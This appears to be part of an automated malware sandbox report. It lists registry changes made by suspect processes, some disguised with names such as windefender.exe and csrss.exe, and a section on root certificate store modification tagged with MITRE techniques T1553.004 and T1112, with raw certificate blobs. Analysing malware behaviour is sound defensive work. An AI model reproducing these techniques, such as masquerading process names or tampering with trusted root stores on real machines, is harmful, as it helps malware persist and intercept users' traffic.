Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Modifies system certificate store 2 TTPs 19 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

DD84.exepatch.execsrss.exerty25.exebuild2.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	DD84.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	DD84.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	DD84.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	rty25.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 